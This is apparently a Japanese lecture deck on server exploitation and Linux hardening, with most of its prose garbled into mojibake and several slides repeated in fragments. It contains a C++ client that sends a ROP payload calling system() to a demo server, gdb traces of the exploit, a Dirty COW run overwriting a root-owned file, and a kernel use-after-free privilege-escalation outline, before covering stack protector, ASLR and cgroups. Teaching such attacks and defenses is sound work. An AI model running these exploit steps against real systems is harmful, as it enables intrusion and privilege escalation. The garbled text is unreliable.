߈ܸऀ͸αʔόͷίϯτϩʔϧΛखʹೖΕ͍ͨ ͦͷͨΊʹ͸shellΛىಈ͍ͨ͠ खͬऔΓૣ͘shellΛ্ཱͪ͛Δʹ͸ system("࣮ߦ͍ͨ͠ίϚϯυ"); Λݺ΂Ε͹ྑ͍ ೚ҙͷؔ਺Λݺ΂Δ͚ͩͰͳ͘ ೚ҙͷจࣈྻΛҾ਺ͱͯ͠౉ͤΔඞཁ͕͋Δ

[1] System V Application Binary Interface AMD64 Architecture Processor Supplement
§3.5.7 Variable Argument Lists x86_64 LinuxͰ͸ؔ਺ͷୈҰҾ਺͸ %rdiϨδελͰ౉͢͜ͱʹͳ͍ͬͯΔ[1] ࣮ߦ͍ͨ͠ίϚϯυΛϝϞϦʹॻ্͍ͨͰ Կͱ͔ͯͦ͠ͷΞυϨεΛ%rdiʹ৐ͤͯ retqͰؔ਺Λݺͼग़͢ඞཁ͕͋Δ rax rbp r8 r12 rbx rsp r9 r13 rcx rsi r10 r14 rdx rdi r11 r15

(gdb) disas _ZNSi6ignoreEl … 0x00007ffff788dfc5 <+309>: pop %r14 0x00007ffff788dfc7 <+311>:
retq 0x7ffff788dfc5 ඪ४ϥΠϒϥϦ౳͔Βpopͯ͠retq͍ͯ͠ΔॴΛ୳ͯ͘͠Δ %r14ʹஔ͖͍ͨ஋ ͦͷޙʹ࣮ߦ͍ͨ͠ΞυϨε ελοΫʹࠨͷΑ͏ʹॻ͍ͯretq͢Δͱ %r14ʹ೚ҙͷ஋Λஔ͘͜ͱ͕Ͱ͖Δ Return Oriented Programming ૢ࡞͍ͨ͠ϨδελΛpopͯ͠retq͍ͯ͠ΔॴΛݟ͚ͭΕ͹ ೚ҙͷҾ਺Λ͚ͭͯ೚ҙͷؔ਺Λݺͼग़͢͜ͱ͕Ͱ͖Δ

boost::asio; using boost::asio::ip::tcp; asio::io_service io_service; tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); const std::vector< uint8_t > command{ 't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ ద౰ͳϑΝΠϧΛ࡞੒

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00 }; for( size_t i = 0u; i != 10u; ++i ) std::copy( command.begin(), command.end(), std::back_inserter( data ) ); data.push_back( 0x0d ); data.push_back( 0x0a ); boost::system::error_code error; asio::write(socket, asio::buffer(data), error); return 0; if( !error ) { asio::streambuf receive_buffer; asio::read_until(socket, receive_buffer, '\n', error); std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl; } } ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ

tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); const std::vector<
uint8_t > command{ 't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00 }; for( size_t i = 0u; i != 10u; ++i ) std::copy( command.begin(), command.end(), std::back_inserter( data ) ); data.push_back( 0x0d ); ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ QPQSEJͯ͠SFURͯ͠Δίʔυʹ ඈͿͨΊͷΞυϨε SEJʹ৐ͤΔ஋ ࣮ߦ͍ͨ͠ίϚϯυ system() sync() exit() γΣϧεΫϦϓτ

$ ./pktgen ΫϥΠΞϯτ αʔό $ gdb -q ./tiny_server Reading symbols
from ./tiny_server...done. (gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/ libthread_db.so.1". [Inferior 1 (process 11310) exited with code 02] (gdb) quit $ ls a tiny_server ͳΜ͔Ͱ͖ͯΔ

߈ܸऀ͕αʔό্Ͱ ೚ҙͷૢ࡞Λग़དྷͯ͠·ͬͨ

߈ܸऀ͕࣮ߦͨ͠shell͸ ߈ܸΛड͚ͨϓϩηεΛ࣮ߦͨ͠ϢʔβͷݖݶͰಈ͘ ߈ܸΛड͚ͨϓϩηε͕ rootͰಈ͍͍ͯͳ͔ͬͨ৔߹ ߈ܸऀ͸αʔόͷ׬શͳঠѲͷͨΊʹ ݖݶঢ֨Λߦ͏ඞཁ͕͋Δ Permission Denied

ݖݶঢ֨ʹ༻͍ΒΕΔ੬ऑੑͷྫ https://dirtycow.ninja/ ͜͜ʹ %*35:$08ͷτοϓϖʔδΛషΔ

DIRTY COW(CVE-2016-5195) mmap࣌ʹMAP_PRIVATEΛ͚ͭΔͱ ϑΝΠϧʹର͢Δॻ͖ࠐΈΛ ΦϦδφϧͷϑΝΠϧʹ ॻ͔ͳ͍Α͏ʹ͢Δ͜ͱ͕Ͱ͖Δ ॻ͖ࠐΈ ಡΈग़͠ ϓϩηε͔Β ݟͨϑΝΠϧ
ΦϦδφϧͷ ϑΝΠϧ ΞυϨεۭؒ

DIRTY COW(CVE-2016-5195) ʮ࢑͘࢖Θͳ͍͔Βॻ͖ࠐΈͷ४උΛϝϞϦ͔ΒԼ͛ͯྑ͍ʯ ࢦఆΛߦ͏ͷͱಉ࣌ʹॻ͖ࠐΈΛߦ͏ͱ ΦϦδφϧͷϑΝΠϧʹॻ͍ͯ͠·͏ෆ۩߹ ΦϦδφϧͷϑΝΠϧʹ ॻ͖ʹ͍ͬͯ͠·͏ ϓϩηε͔Β ݟͨϑΝΠϧ ΦϦδφϧͷ
ϑΝΠϧ MADV_DONTNEEDͰ ϝϞϦ͔ΒԼ͛Δ

DIRTY COW(CVE-2016-5195) https://github.com/kcgthb/RHEL6.x-COW/blob/master/6.7/noc0w.patch ͜ͷෆ۩߹ࣗମ͸ෳࡶͳ΋ͷͰ͸ͳ͘मਖ਼ύον͸ߦఔ ͜͜ʹ %*35:$08ͷमਖ਼ύονΛషΔ

DIRTY COW(CVE-2016-5195) root # echo 'abcde' >sample.txt root # ls
-lha sample.txt -rw-r--r-- 1 root root 6 Mar 18 11:21 sample.txt root # logout non_root $ cat sample.txt abcde non_root $ ./dirtyc0w sample.txt ‘pwned' mmap 7f214599a000 ^C non_root $ cat sample.txt pwned non_root $ ls -lha sample.txt -rw-r--r-- 1 root root 6 3݄ 18 11:21 sample.txt ҰൠϢʔβ͕ root͔͠ॻ͚ͳ͍ϑΝΠϧΛ ॻ͖׵͑ͯ͠·ͬͨ ͜Ε͕ՄೳͳΒrootϩάΠϯͷೝূΛແ͘͢͜ͱͩͬͯग़དྷΔ

CVE-2017-15265 ALSA Sequencer[1]ͷϙʔτΛ࡞͙ͬͯ͢ʹഁغ͢Δ [1] ALSA Sequencer http://www.alsa-project.org/~frank/alsa-sequencer/index.html Ϣʔβۭؒ Χʔωϧۭؒ ϙʔτ͍ͩ͘͞
Ͳ͏ͧ ϙʔτͷͨΊͷ ྖҬͷ֬อ ϙʔτΛॳظԽ εϨου1 εϨου1 ϙʔτ΋͏͍͍΍ ϙʔτͷͨΊͷ ྖҬͷղ์ εϨου2 εϨου2 ͠Α͏ͱࢥͬͨΒ ແ͔ͬͨ

͜͜ʹ -JOVYΧʔωϧͷ "-4"4FRVFODFSͷॳظԽதͰ ίʔϧόοΫΛಡΜͰ͍ΔՕॴΛషΔ Use After Free Χʔωϧͷߏ଄ମʹ͸ଟ਺ͷίʔϧόοΫؔ਺͕ઃఆ͞Ε͍ͯΔ ղ์ࡁΈͷϝϞϦ͸ಉαΠζͷϝϞϦΛ֬อ͢Δͱ ߴ֬཰Ͱಉ͡ྖҬΛऔಘͰ͖Δ
ίʔϧόοΫΛ೚ҙͷΞυϨεʹॻ͖׵͑ͯΧʔωϧʹݺ͹ͤΔ https://elixir.bootlin.com/linux/v4.15.10/source/sound/core/seq/seq_clientmgr.c#L619 ϙʔτ͸΋͏ղ์͞ΕͯΔ͚Ͳ ͜͜Ͱϙʔτʹઃఆ͞Εͨ ίʔϧόοΫΛݺΜͰΔ

Use After Free ͜ΕΛར༻ͯ͠ԿΛݺ͹ͤΔ͔ ͦΕ͸΋ͪΖΜ commit_creds( prepare_kernel_cred( NULL ) );
༁ԶΛrootʹ͠Ζ ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹ ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ

Use After Free $7& $7& $7& ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹ ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ Use After
FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ $7& $7& $7& $7&

߈ܸऀ͕αʔόΛ ׬શʹঠѲͯ͠͠·ͬͨ

ࠣࡉͳෆ۩߹͕ ͠͹͠͹αʔόͷ ηΩϡϦςΟΛ୆ແ͠ʹ͢Δ

Ұ൪ྑ͍ͷ͸ෆ۩߹͕ແ͍ࣄ͕ͩ ͦ͏͸͍ͬͯ΋ෆ۩߹͸ग़ͯ͘ΔͷͰ ෆ۩߹͸ग़Δ΋ͷͱͯ͠ ग़དྷΔ͚ͩக໋తͳ߈ܸʹ௚݁ͤ͞ͳ͍ҝͷ ରॲΛߦ͏ඞཁ͕͋Δ

TUBDLQSPUFDUPS f: push %rbp mov %rsp,%rbp sub $0x20,%rsp mov %edi,-0x14(%rbp)
mov %esi,-0x18(%rbp) mov %fs:0x28,%rax mov %rax,-0x8(%rbp) xor %eax,%eax mov -0x14(%rbp),%edx mov -0x18(%rbp),%eax add %edx,%eax mov -0x8(%rbp),%rcx xor %fs:0x28,%rcx je 40055f <f+0x39> callq 400400 <__stack_chk_fail@plt> leaveq retq f: push %rbp mov %rsp,%rbp mov %edi,-0x4(%rbp) mov %esi,-0x8(%rbp) mov -0x4(%rbp),%edx mov -0x8(%rbp),%eax add %edx,%eax pop %rbp retq ͋Δ࣌ ͳ͍࣌ gccͷ࠷దԽΦϓγϣϯͷ1ͭ ͳΜ͔ ૿͑ͯΔ

TUBDLQSPUFDUPS f: push %rbp mov %rsp,%rbp sub $0x20,%rsp mov %edi,-0x14(%rbp)
mov %esi,-0x18(%rbp) mov %fs:0x28,%rax mov %rax,-0x8(%rbp) xor %eax,%eax mov -0x14(%rbp),%edx mov -0x18(%rbp),%eax add %edx,%eax mov -0x8(%rbp),%rcx xor %fs:0x28,%rcx je 40055f <f+0x39> callq 400400 <__stack_chk_fail@plt> leaveq retq ͋ΔݻఆͷΞυϨε͔ΒಡΜͩ஋Λ ελοΫʹੵΉ ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ ελοΫͷ஋Λൺֱ͠ Ұக͠ͳ͔ͬͨΒabort͢Δ

TUBDLQSPUFDUPS ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺f͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺gͷSCQ ϥϯμϜͳ஋ όοϑΝΦʔόʔϥϯͰ
returnΞυϨεΛॻ͖׵͑Δʹ͸ ͜͜·Ͱॻ͖ࠐΉඞཁ͕͋Δ ؒʹڬ·͍ͬͯΔ ͜ͷ஋Λॻ͖׵͑ͯ͠·͏ͱ ϓϩάϥϜ͸ҟৗऴྃ͢Δ όοϑΝΦʔόʔϥϯΛར༻ͨ͠ ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

TUBDLQSPUFDUPS xor %eax,%eax mov -0x14(%rbp),%edx mov -0x18(%rbp),%eax add %edx,%eax mov
-0x8(%rbp),%rcx xor %fs:0x28,%rcx je 40055f <f+0x39> callq 400400 <__stack_chk_fail@plt> leaveq retq ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ ελοΫͷ஋Λൺֱ͠ Ұக͠ͳ͔ͬͨΒabort͢Δ ελοΫ͕ഁյ͞ΕͨޙͳͷͰ ຊདྷͷॲཧʹ໭Δ͜ͱ͸Ͱ͖ͳ͍ stack-protector͸ ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔ

͜͜ʹ 3FE)BUʹΑΔ#MVFCPSOFͷղઆΛషΔ https://access.redhat.com/security/vulnerabilities/blueborne ࣮ࡍʹTUBDLQSPUFDUPS͕໾ʹཱ͍ͬͯΔέʔε Blueborne(CVE-2017-1000251) γεςϜʹBluetoothͰ઀ଓͰ͖Δೝূ͞Ε͍ͯͳ͍Ϣʔβ͕ γεςϜΛΫϥογϡͤ͞Δࣄ͕Ͱ͖Δ ͋Δ͍͸stack protector͕༗ޮʹͳ͍ͬͯͳ͍৔߹ ೚ҙͷίʔυ͕࣮ߦ͞ΕΔՄೳੑ͕͋Δ

TUBDLQSPUFDUPS stack protector͸ελοΫΛগ͠༨෼ʹ࢖͍ ϝϞϦΞΫηεͱൺֱ͕༨෼ʹൃੜ͢Δ -fno-stack-protector(σϑΥϧτ) -fstack-protector(͓͢͢Ί) -fstack-protector-all stack protectorΛ࢓ֻ͚ͳ͍ όΠτҎ্ͷจࣈྻΛѻ͏ؔ਺ʹstack
protectorΛ࢓ֻ͚Δ ͋ΒΏΔؔ਺ʹstack protectorΛ࢓ֻ͚Δ ࢓ֻ͚͓ͯ͘ͱ໾ʹཱͭͱ͜Ζ͚ͩʹ࢓ֻ͚͓͖͍ͯͨ

TUBDLQSPUFDUPS stack protector͸ ελοΫ্ͰͷϝϞϦഁյΛݕ஌͢Δ όοϑΝΦʔόʔϥϯ͕ώʔϓ্ͳͲͷ ελοΫҎ֎ͷ৔ॴͰى͜Γ ͦΕʹΑͬͯഁյ͞ΕͨΞυϨεʹδϟϯϓ͕Մೳͳ৔߹ stack protector͸߈ܸΛ๷͙ࣄ͕Ͱ͖ͳ͍

address space layout randomization $ cat /proc/self/maps 00400000-00407000 r-xp 00000000
08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨

08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨ ελοΫͷΞυϨε͕࣮ߦ͢ΔͨͼʹมԽ͍ͯ͠Δ 7ffeb0a50000-7ffeb0a72000 7fffe276e000-7fffe2790000 system()ʹ౉͢ҝʹॻ͖ࠐΜͩ γΣϧεΫϦϓτͷΞυϨε͕ຖճมΘΔҝ εΫϦϓτͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack] 7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar] 7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] $ cat /proc/self/maps 00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat … 00608000-00629000 rw-p 00000000 00:00 0 [heap] 7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive 7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so … 7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack] 7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar] 7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ 1ճ໨ 2ճ໨ ϥΠϒϥϦͷ഑ஔ΋࣮ߦ͢ΔͨͼʹมԽ 7f9e5b63d000-7f9e5b7cc000 7f5e2b2ed000-7f5e2b47c000 system()౳͕ஔ͔Ε͍ͯΔΞυϨε΋ ϥϯμϜʹมԽ͢Δҝ ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

$ gdb -q ./tiny_server Reading symbols from ./tiny_server...done. (gdb) set
disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹

disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹ system()͕ظ଴ͨ͠ΞυϨεͱҟͳΔ৔ॴʹ഑ஔ͞Ε͍ͯΔ 0x00007ffff6f6d350 0x7f51c76cd350 ASLRແ͠ͷ৔߹ʹsystem()͕ஔ͍ͯ͋ͬͨ৔ॴ ࣮ࡍʹsystem()͕ ഑ஔ͞Ε͍ͯͨ৔ॴ

disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹ ͦΕҎલʹ࠷ॳʹpop %rdi͢Δҝͷίʔυย͕ ظ଴ͨ͠৔ॴʹͳ͍ 0x00007ffff7931f54 No function contains specified address ASLRແ͠ͷ৔߹ʹpop %rdiͱretq͕͋ͬͨ৔ॴ ͦ͜ʹؔ਺͸ແ͍

disable-randomization off (gdb) run Starting program: /home/fadis/tiny_server_test/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7931f54 in ?? () (gdb) backtrace #0 0x00007ffff7931f54 in ?? () #1 0x00007fffffffd3a0 in ?? () #2 0x00007ffff6f6d350 in ?? () #3 0x00007ffff700e5c0 in ?? () #4 0x00007ffff6f63b90 in ?? () #5 0x0061206863756f74 in ?? () #6 0x0000000000000000 in ?? () (gdb) p &system $1 = (<text variable, no debug info> *) 0x7f51c76cd350 <system> (gdb) disas 0x7ffff7931f54 No function contains specified address. ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹ ͦͷ݁Ռ Կ΋ׂΓ౰ͯΒΕ͍ͯͳ͍ϝϞϦʹretqͰඈ΅͏ͱͯ͠ ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠ ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔࣄ͕Ͱ͖ͨ

LinuxͷίϯςφΛ׆༻ͤΑ

਌ϓϩηεͱࢠϓϩηε ϓϩηεத͔ΒผͷϓϩηεΛ্ཱͪ͛Δͱ ͦͷϓϩηε͸ݩͷϓϩηεͷࢠʹͳΔ ϓϩηε /bin/ls execl("/bin/ls","/bin/ls",nullptr ); ىಈ ਌ϓϩηε ࢠϓϩηε

init!"!5*[agetty] #!busybox #!login!!!bash!!!top #!sshd!"!sshd!!!sshd!!!bash!!!pstree $ %!sshd!!!sshd!!!bash!!!vim %!udevd γεςϜىಈ࣌ʹ࣮ߦ͞ΕΔ initҎ֎ͷશͯͷϓϩηε͸ init͔ΒḷΕΔ਌ࢠؔ܎ͷͲ͔͜ʹͿΒԼ͕͍ͬͯΔ
initͷࢠͷ sshd͔Βىಈ͞Εͨ bash͔Βىಈ͞Εͨ vim ਌ϓϩηεͱࢠϓϩηε

init!"!5*[agetty] #!busybox #!login!!!bash!!!top #!sshd!"!sshd!!!sshd!!!bash!!!pstree $ %!sshd!!!sshd!!!bash!!!vim %!udevd ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηεʹ γεςϜͷϦιʔεͷ࢖༻ʹؔ͢Δ੍ݶΛઃఆ͢Δ cgroups
ྫ: ͜ͷൣғͷϓϩηε͸ 1൪໨ͷCPU͔͠ ࢖ͬͯ͸͍͚ͳ͍ (cpuset cgroup)

ϒϩοΫI/O cgroup ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ ϒϩοΫσόΠε΁ͷI/OΛ੍ݶ͢Δ ͜ͷάϧʔϓ಺ͷϓϩηε͸ ͲΜͳʹετϨʔδʹ༨ྗ͕͋ͬͯ΋ ࢦఆ͞ΕͨҎ্ͷI/OଳҬΛ࢖͑ͳ͍ ߹ܭ.CQT੍ݶ

ະ࢖༻ CPU cgroup ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ CPUͷ࢖༻཰Λ੍ݶ͢Δ ͜ͷάϧʔϓ಺ͷϓϩηε͸ ͲΜͳʹCPUʹ༨ྗ͕͋ͬͯ΋ ࢦఆ͞ΕͨҎ্ʹ CPUΛ࢖͏ࣄ͸Ͱ͖ͳ͍ ߹ܭ੍ݶ

cgroups ଞʹ΋ϝϞϦͷ࢖༻཰΍HugeTLBͷׂΓ౰ͯͷ੍ݶͳͲ͕ උΘ͍ͬͯΔ͕ ੬ऑੑ߈ܸʹର͢Δඋ͑ͱͯ͠஫໨͢΂͖ͳͷ͸ pids devices ͱ

PIDs cgroups ࢦఆͨ͠ϓϩηεάϧʔϓ಺Ͱ ࡞੒Ͱ͖Δϓϩηεͷ࠷େ਺Λ੍ݶ͢Δ ϓϩηε /bin/ls execl("/bin/ls","/bin/ls",nullptr ); ىಈ άϧʔϓ಺ͷϓϩηε਺͕࠷େʹୡ͍ͯ͠Δҝ
ࢠϓϩηεͷੜ੒Λڋ൱

tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); const std::vector<
